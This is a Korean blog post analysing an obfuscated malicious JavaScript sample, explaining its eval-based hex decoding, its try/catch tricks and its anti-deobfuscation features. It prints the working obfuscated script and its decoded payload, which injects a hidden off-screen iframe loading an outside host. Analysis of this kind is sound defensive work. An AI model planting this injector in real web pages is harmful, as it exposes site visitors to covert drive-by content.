1. 개요
이 난독화는 몇몇 난독화들이 중복적으로 사용되어 있다.
1.1. 원본 소스코드
asq=function(){return n[i];};ww=window;ss=String.fromCharCode;try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}{try{whwej=~2;}catch(agdsg){whwej=0;}if(whwej){try{document.body++;}catch(bawetawe){if(ww.document){n="0xa,0xa,0x6a,0x67,0x21,0x29,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x74,0x43,0x7a,0x55,0x62,0x68,0x4f,0x62,0x6e,0x66,0x29,0x28,0x63,0x70,0x65,0x7a,0x28,0x2a,0x5c,0x31,0x5e,0x2a,0x7c,0xe,0xa,0xa,0xa,0x6a,0x67,0x73,0x62,0x6e,0x66,0x73,0x29,0x2a,0x3c,0xe,0xa,0xa,0x7e,0x21,0x66,0x6d,0x74,0x66,0x21,0x7c,0xe,0xa,0xa,0xa,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x23,0x3d,0x6a,0x67,0x73,0x62,0x6e,0x66,0x21,0x74,0x73,0x64,0x3e,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x64,0x69,0x77,0x62,0x73,0x6c,0x70,0x77,0x74,0x6c,0x6a,0x2f,0x6a,0x6f,0x67,0x70,0x30,0x65,0x45,0x79,0x4d,0x71,0x53,0x31,0x4d,0x39,0x52,0x58,0x31,0x49,0x55,0x51,0x48,0x31,0x4e,0x79,0x62,0x4d,0x31,0x62,0x7b,0x58,0x79,0x31,0x4f,0x4c,0x4a,0x51,0x31,0x36,0x4e,0x6d,0x44,0x31,0x58,0x32,0x37,0x74,0x30,0x28,0x21,0x78,0x6a,0x65,0x75,0x69,0x3e,0x28,0x32,0x31,0x31,0x28,0x21,0x69,0x66,0x6a,0x68,0x69,0x75,0x3e,0x28,0x32,0x31,0x31,0x28,0x21,0x74,0x75,0x7a,0x6d,0x66,0x3e,0x28,0x78,0x6a,0x65,0x75,0x69,0x3b,0x32,0x31,0x31,0x71,0x79,0x3c,0x69,0x66,0x6a,0x68,0x69,0x75,0x3b,0x32,0x31,0x31,0x71,0x79,0x3c,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x3b,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x3c,0x77,0x6a,0x74,0x6a,0x63,0x6a,0x6d,0x6a,0x75,0x7a,0x3b,0x69,0x6a,0x65,0x65,0x66,0x6f,0x3c,0x6d,0x66,0x67,0x75,0x3b,0x2e,0x32,0x31,0x31,0x31,0x31,0x71,0x79,0x3c,0x75,0x70,0x71,0x3b,0x31,0x3c,0x28,0x3f,0x3d,0x30,0x6a,0x67,0x73,0x62,0x6e,0x66,0x3f,0x23,0x2a,0x3c,0xe,0xa,0xa,0x7e,0xe,0xa,0xa,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x6a,0x67,0x73,0x62,0x6e,0x66,0x73,0x29,0x2a,0x7c,0xe,0xa,0xa,0xa,0x77,0x62,0x73,0x21,0x67,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x74,0x73,0x64,0x28,0x2d,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x64,0x69,0x77,0x62,0x73,0x6c,0x70,0x77,0x74,0x6c,0x6a,0x2f,0x6a,0x6f,0x67,0x70,0x30,0x65,0x45,0x79,0x4d,0x71,0x53,0x31,0x4d,0x39,0x52,0x58,0x31,0x49,0x55,0x51,0x48,0x31,0x4e,0x79,0x62,0x4d,0x31,0x62,0x7b,0x58,0x79,0x31,0x4f,0x4c,0x4a,0x51,0x31,0x36,0x4e,0x6d,0x44,0x31,0x58,0x32,0x37,0x74,0x30,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x3e,0x28,0x2e,0x32,0x31,0x31,0x31,0x31,0x71,0x79,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x77,0x6a,0x74,0x6a,0x63,0x6a,0x6d,0x6a,0x75,0x7a,0x3e,0x28,0x69,0x6a,0x65,0x65,0x66,0x6f,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x3e,0x28,0x31,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x3e,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x3e,0x28,0x31,0x28,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x78,0x6a,0x65,0x75,0x69,0x28,0x2d,0x28,0x32,0x31,0x31,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x69,0x66,0x6a,0x68,0x69,0x75,0x28,0x2d,0x28,0x32,0x31,0x31,0x28,0x2a,0x3c,0xe,0xa,0xa,0xa,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x74,0x43,0x7a,0x55,0x62,0x68,0x4f,0x62,0x6e,0x66,0x29,0x28,0x63,0x70,0x65,0x7a,0x28,0x2a,0x5c,0x31,0x5e,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x67,0x2a,0x3c,0xe,0xa,0xa,0x7e".split(",");h=2;s="";for(i=0;i-700!=0;i++){k=i;s=s.concat(ss(eval(asq())-1));}z=s;eval(""+s);}}}}2. 분석
2.1. 난독화 소스코드 분석
asq = function () {
return n[i];
}; // function에 문자배열 0번부터 하나씩 반환해 준다.
ww = window;
ss = String.fromCharCode;
try {
document.body = ~1 // document.body에 -2를 저장 -> 에러 발생
// 자바스크립트에서 틸드(tilde : ~) 연산은 0과 1을 모두 뒤집는 Bitwise NOT 연산자
// 8자리로 표현해서 0000 0001을 틸드연산하면 1111 1110 이 됨
// 맨 앞의 비트는 부호비트이기 때문에 1의 보수 2의 보수로 계산해 보면 -2가 됨
// 편하게 ~n = -(n+1)로 연산 가능
} catch (dgsgsdg) {
zz = 12 * 2 + 1 + 1; // 쓸모없는 연산
whwej = 12; // 쓸모없는 값
} {
try {
whwej = ~2; // whwej에 -3을 저장
}
catch (agdsg) {
whwej = 0; // 실행 안함
}
if (whwej) { // if (-3) 자바스크립트는 0이 아닌 모든 숫자는 true로 인식
try {
document.body++; // 에러 발생
}
catch (bawetawe) {
if (ww.document) { // window.document로 발생하는 문자열 또한 true로 인식
n = "0xa,0xa,0x6a,0x67,0x21,0x29,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x74,0x43,0x7a,0x55,0x62,0x68,0x4f,0x62,0x6e,0x66,0x29,0x28,0x63,0x70,0x65,0x7a,0x28,0x2a,0x5c,0x31,0x5e,0x2a,0x7c,0xe,0xa,0xa,0xa,0x6a,0x67,0x73,0x62,0x6e,0x66,0x73,0x29,0x2a,0x3c,0xe,0xa,0xa,0x7e,0x21,0x66,0x6d,0x74,0x66,0x21,0x7c,0xe,0xa,0xa,0xa,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x23,0x3d,0x6a,0x67,0x73,0x62,0x6e,0x66,0x21,0x74,0x73,0x64,0x3e,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x64,0x69,0x77,0x62,0x73,0x6c,0x70,0x77,0x74,0x6c,0x6a,0x2f,0x6a,0x6f,0x67,0x70,0x30,0x65,0x45,0x79,0x4d,0x71,0x53,0x31,0x4d,0x39,0x52,0x58,0x31,0x49,0x55,0x51,0x48,0x31,0x4e,0x79,0x62,0x4d,0x31,0x62,0x7b,0x58,0x79,0x31,0x4f,0x4c,0x4a,0x51,0x31,0x36,0x4e,0x6d,0x44,0x31,0x58,0x32,0x37,0x74,0x30,0x28,0x21,0x78,0x6a,0x65,0x75,0x69,0x3e,0x28,0x32,0x31,0x31,0x28,0x21,0x69,0x66,0x6a,0x68,0x69,0x75,0x3e,0x28,0x32,0x31,0x31,0x28,0x21,0x74,0x75,0x7a,0x6d,0x66,0x3e,0x28,0x78,0x6a,0x65,0x75,0x69,0x3b,0x32,0x31,0x31,0x71,0x79,0x3c,0x69,0x66,0x6a,0x68,0x69,0x75,0x3b,0x32,0x31,0x31,0x71,0x79,0x3c,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x3b,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x3c,0x77,0x6a,0x74,0x6a,0x63,0x6a,0x6d,0x6a,0x75,0x7a,0x3b,0x69,0x6a,0x65,0x65,0x66,0x6f,0x3c,0x6d,0x66,0x67,0x75,0x3b,0x2e,0x32,0x31,0x31,0x31,0x31,0x71,0x79,0x3c,0x75,0x70,0x71,0x3b,0x31,0x3c,0x28,0x3f,0x3d,0x30,0x6a,0x67,0x73,0x62,0x6e,0x66,0x3f,0x23,0x2a,0x3c,0xe,0xa,0xa,0x7e,0xe,0xa,0xa,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x6a,0x67,0x73,0x62,0x6e,0x66,0x73,0x29,0x2a,0x7c,0xe,0xa,0xa,0xa,0x77,0x62,0x73,0x21,0x67,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x74,0x73,0x64,0x28,0x2d,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x64,0x69,0x77,0x62,0x73,0x6c,0x70,0x77,0x74,0x6c,0x6a,0x2f,0x6a,0x6f,0x67,0x70,0x30,0x65,0x45,0x79,0x4d,0x71,0x53,0x31,0x4d,0x39,0x52,0x58,0x31,0x49,0x55,0x51,0x48,0x31,0x4e,0x79,0x62,0x4d,0x31,0x62,0x7b,0x58,0x79,0x31,0x4f,0x4c,0x4a,0x51,0x31,0x36,0x4e,0x6d,0x44,0x31,0x58,0x32,0x37,0x74,0x30,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x3e,0x28,0x2e,0x32,0x31,0x31,0x31,0x31,0x71,0x79,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x77,0x6a,0x74,0x6a,0x63,0x6a,0x6d,0x6a,0x75,0x7a,0x3e,0x28,0x69,0x6a,0x65,0x65,0x66,0x6f,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x3e,0x28,0x31,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x3e,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0x67,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x3e,0x28,0x31,0x28,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x78,0x6a,0x65,0x75,0x69,0x28,0x2d,0x28,0x32,0x31,0x31,0x28,0x2a,0x3c,0x67,0x2f,0x74,0x66,0x75,0x42,0x75,0x75,0x73,0x6a,0x63,0x76,0x75,0x66,0x29,0x28,0x69,0x66,0x6a,0x68,0x69,0x75,0x28,0x2d,0x28,0x32,0x31,0x31,0x28,0x2a,0x3c,0xe,0xa,0xa,0xa,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x74,0x43,0x7a,0x55,0x62,0x68,0x4f,0x62,0x6e,0x66,0x29,0x28,0x63,0x70,0x65,0x7a,0x28,0x2a,0x5c,0x31,0x5e,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x67,0x2a,0x3c,0xe,0xa,0xa,0x7e".split(",");
//split 메소드를 통해 ","를 잘라내여 배열로 데이터가 저장
h = 2; // 쓸모없는 값
s = ""; // s 변수 초기화
for (i = 0; i - 700 != 0; i++) {
k = i; // 쓸모없는 값
s = s.concat(ss(eval(asq()) - 1));
// s = s.concat(String.fromCharCode(eval(function ()) -1));
// n에 배열로 저장된 값을 각각 1씩 빼며, 뺀 결과는 10진수 형태로 변환
// fromCharCode를 통해 10진수의 값을 아스키코드 Char로 변환
// concat 메소드를 사용하여 낱개의 결과를 하나의 배열로 연결
}
z = s; // 쓸모없는 값
eval("" + s); // 완성된 s를 실행하기 위해 eval을 사용
}
}
}
}2.2. 난독화 해제
if (document.getElementsByTagName('body')[0]) {
// body 태그의 존재 유무 확인
iframer(); // body가 존재하면 iframer 함수를 실행
} else {
document.write("<iframe src='http://chvarkovski.info/dDxLpR0L8QW0HTPG0MxaL0azWx0NKIP05MlC0W16s/'width='100' height='100' style='width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
} //body가 존재하지 않으면 코드실행
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://chvarkovski.info/dDxLpR0L8QW0HTPG0MxaL0azWx0NKIP05MlC0W16s/');
f.style.left = '-10000px';
f.style.visibility = 'hidden';
f.style.top = '0';
f.style.position = 'absolute';
f.style.top = '0';
f.setAttribute('width', '100');
f.setAttribute('height', '100');
document.getElementsByTagName('body')[0].appendChild(f);
// body에 iframe 요소를 선언하고 추가 파라미터를 저장
}iframe 선언하는 방식 중에 DOM을 이용하여 하나의 요소로 선언할 수 있다. DOM을 이용하려면 body태그가 필요한데, 이 태그는 자바스크립트가 아닌 HTML 태그이다. 이러한 방식은 자바스크립트 엔진을 이용한 난독화를 분석하는 도구들은 자바스크립트로 인식하지 않기 때문에 하나의 Anti-DeObfuscation 기법이라 할 수 있다.
3. 정리
- 자바스크립트 언어의 특징으로 0 값이 아닌 숫자는 모두 true로 인식
- 음수 값을 틸드 연산을 이용하여 표현
- 16진수 값을 변형
- 조건부 실행
- DOM 객체를 이용한 자바스크립트 실행
- width, height 값이 시각적으로 보일 수 있는 크기라도 감출 수 있음
반응형
'Information Security > Malware' 카테고리의 다른 글
| jjencode 분석 (10) | 2014.03.14 |
|---|---|
| Sothink SWF Decompiler 3.7 (4) | 2014.01.06 |
| Base64를 이용한 JavaScript 난독화 (0) | 2013.09.24 |
| Network Tool - Fiddler Web Debugger (2) | 2013.09.17 |
| Analysis Tool - Structured Storage Viewer(SSView) (0) | 2013.09.15 |
